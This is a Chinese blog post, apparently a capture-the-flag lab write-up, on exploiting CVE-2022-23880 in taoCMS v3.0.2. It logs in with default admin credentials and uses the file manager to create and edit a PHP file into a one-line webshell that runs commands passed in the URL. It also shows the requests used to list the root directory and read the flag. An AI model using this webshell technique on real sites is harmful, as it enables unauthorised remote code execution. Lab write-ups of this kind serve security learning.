前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2022-23880

CVE-2022-23880

作者头像
cultureSun
发布2023-05-18 14:47:06
2370
发布2023-05-18 14:47:06
举报
文章被收录于专栏:cultureSun学安全cultureSun学安全

简介

春秋云境免费靶场挑战。 靶场介绍:taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码。

详解

  1. 打开页面随便点点,发现点管理会跳到一个登录页面。
1679965453115.png
1679965453115.png
  1. 百度一下默认账户admin,密码tao。尝试登录可以登录。
16799656818431.png
16799656818431.png
  1. 提示文件上传漏洞,点击文件管理,发现可以编辑文件,还能上传或者新建文件。
1679966094475.png
1679966094475.png
  1. 尝试上传个简单webshell,对后缀名过滤了,上传不了php文件。
  2. 那就试试新建文件,发现可以。并且可以编辑。创建shell.php,然后编辑写入webshell。
16799665202004.png
16799665202004.png
代码语言:javascript
复制
<?php
system($_GET[1]);
?>

PHP

  1. 尝试访问,并传参ls /。

http://eci-2ze6sij0ebixzvz39rhw.cloudeci1.ichunqiu.com/shell.php?1=ls%20/ 页面显示:bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

  1. 有个flag,尝试传参cat /flag。 http://eci-2ze6sij0ebixzvz39rhw.cloudeci1.ichunqiu.com/shell.php?1=cat%20/flag
  2. 成功获取到flag----flag{bcb7f369-2cd6-47ad-b522-591ce2bbd0bb}

结语

虽然获取到flag,但是后知后觉应该不需要创建文件,编辑已有文件直接写入webshell也可以。 尝试在install.php中写入webshell发现还真可以。

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 简介
  • 详解
  • 结语
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档